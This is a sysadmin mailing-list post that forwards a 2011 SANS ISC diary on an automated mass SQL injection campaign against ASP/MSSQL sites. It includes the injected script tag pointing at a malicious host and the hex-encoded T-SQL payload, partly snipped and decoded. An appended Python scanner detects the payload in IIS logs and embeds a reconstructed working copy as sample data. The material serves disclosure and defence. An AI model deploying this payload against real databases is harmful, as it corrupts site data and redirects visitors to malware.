Just FYI, for the list (sorry if it's already been posted; I looked and didn't 
see it).

SQL Injection Attack happening ATM<http://isc.sans.edu/diary/SQL+Injection+Attack+happening+ATM/12127>
Published: 2011-12-01,
Last Updated: 2011-12-02 11:24:01 UTC
by Mark Hofman (Version: 1)

We've had several reports (thanks guys) of sites being injected with the 
following string:

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

Typically it is inserted into several tables. From the information gathered so 
far it looks targeted at ASP, IIS and MSSQL backends, but that is just 
speculation. If you find that you have been infected, please let us know, and if 
you can share packets or logs, please upload them via the contact form.

Mark

UPDATE:

Thanks to those that posted comments and those that worked behind the scenes. 
The injection string is along the lines of what Terry posted in his comments. The 
one I ran across is (note that the whole string is not provided):

73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404
320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f5220736
56c65637420632e---------snip----------9746c653e3c7363726970742727202729204645544348204e4558542046524f4d
205461626c655f437572736f722049444f2040542c404320454e4420434c4f5345205461626c655f437572736f7220444
5414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29

Which decodes to:

declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T 
VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select 
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, 
INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('------SNIP-------
IN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script 
src="XXXX://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+']))
 where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' 
') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE 
Table_Cursor+................

When discovered yesterday, about 80 sites showed in Google; this morning about 
200, by lunch 1000, and a few minutes ago 4000+. Targets include ASP sites and 
ColdFusion (thanks Will). The attack seems to work on all versions of MSSQL.

The hex will show in the IIS log files, so monitor those. Make sure that 
applications only have the access they require, so if a page does not need to 
update the DB, use an account that can only read.

Sources of the attack vary; it is automated and spreading fairly rapidly. As 
one of the comments mentioned, it looks like LizaMoon, which infected over 
1,000,000 sites earlier this year.

The trail of the files ends up on an "adobeflash page" or fake AV. Blocking access 
to the lilupophilupop site will prevent infection of clients should they hit an 
infected site and be redirected.

Mark H - Shearwater<http://www.shearwater.com.au>
Keywords: SQL Injection 
attack<http://isc.sans.edu/tag.html?tag=SQL%20Injection%20attack>


---
To manage subscriptions click here: 
http://lyris.sunbelt-software.com/read/my_forums/
or send an email to [email protected]
with the body: unsubscribe ntsysadmin
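The diary's advice is to watch the IIS logs for the hex blob, because the whole attack travels in the query string as declare/set/cast(0x...)/exec. Below is an added example of that monitoring (my own code, not from the ISC diary or the list post) that walks an IIS W3C log, pulls out long 0x hex literals from cs-uri-query, decodes them back to T-SQL, and reports whether the decoded statement walks INFORMATION_SCHEMA and which host its injected <script> tag points at. The log excerpt is constructed: the field layout is the default IIS W3C one, the IP addresses are documentation addresses, and the payload is a shortened T-SQL cursor loop modelled on the diary's decoded string, re-encoded to hex here so there is something to decode. It is not a capture of the real attack.

```python
"""Spot hex-encoded T-SQL injection attempts in IIS W3C logs.

Added example, not code from the ISC diary or the list post. The log
excerpt and the payload below are constructed for illustration.
"""
import re
from urllib.parse import unquote, urlparse

# Constructed stand-in for the injected statement. Same shape as the
# diary's decoded payload (cursor over INFORMATION_SCHEMA.columns, UPDATE
# that prepends a <script> tag to every text column); hostname from the diary.
SAMPLE_TSQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME "
    "from INFORMATION_SCHEMA.columns c "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=''\"></title>"
    "<script src=\"http://lilupophilupop.com/sl.php\"></script><!--''') "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_HEX = SAMPLE_TSQL.encode("ascii").hex()

# Constructed log excerpt: one benign request, then one request carrying
# the declare/set/cast(0x...)/exec wrapper the diary quotes. IIS writes
# spaces in the query as '+' and parentheses/@ percent-encoded.
SAMPLE_LOG = f"""#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2011-12-01 10:15:31 192.0.2.10 GET /products.asp id=17 80 198.51.100.20 200
2011-12-01 10:15:32 192.0.2.10 GET /products.asp id=17;declare+@s+varchar(4000)+set+@s=cast(0x{SAMPLE_HEX}+as+varchar%284000%29%29+exec%28%40s%29 80 198.51.100.7 200
"""

# A 0x literal of 20+ hex digits inside a query string is rarely legitimate;
# the real payload runs to thousands of digits.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{20,})")
SQL_MARKERS = ("declare", "cast(", "exec(")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def decode_hex_literal(hexdigits):
    """Turn the 0x... literal handed to CAST() back into the T-SQL text."""
    if len(hexdigits) % 2:          # tolerate a truncated trailing nibble
        hexdigits = hexdigits[:-1]
    return bytes.fromhex(hexdigits).decode("latin-1")


def analyse_query(uri_query):
    """Return findings for a cs-uri-query value, or None if it looks clean."""
    query = unquote(uri_query.replace("+", " "))
    if not any(marker in query.lower() for marker in SQL_MARKERS):
        return None
    literals = HEX_LITERAL.findall(query)
    if not literals:
        return None
    decoded = " ".join(decode_hex_literal(h) for h in literals)
    src = re.search(r'<script\s+src="([^"]+)"', decoded, re.IGNORECASE)
    return {
        "decoded_sql": decoded,
        "walks_information_schema": "information_schema" in decoded.lower(),
        "script_host": urlparse(src.group(1)).hostname if src else None,
    }


def scan_log(text):
    """Run analyse_query over every request in an IIS W3C log and collect hits."""
    hits = []
    for rec in parse_w3c(text):
        finding = analyse_query(rec.get("cs-uri-query", "-"))
        if finding:
            finding.update(
                client=rec.get("c-ip"),
                uri=rec.get("cs-uri-stem"),
                when=f"{rec.get('date')} {rec.get('time')}",
            )
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['when']} {hit['client']} -> {hit['uri']} "
              f"injects script from {hit['script_host']}")
        print("  decoded:", hit["decoded_sql"][:100], "...")
```

Point it at a real log by reading the file into `scan_log`; the #Fields header in each file drives the column mapping, so non-default layouts still parse. Decoding the literal is what makes the alert actionable: the hostname it yields is the one to block at the proxy, as the diary recommends, and the INFORMATION_SCHEMA walk tells you the web application's DB account had enough rights to enumerate and update every text column, which is exactly the least-privilege failure the diary points out.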
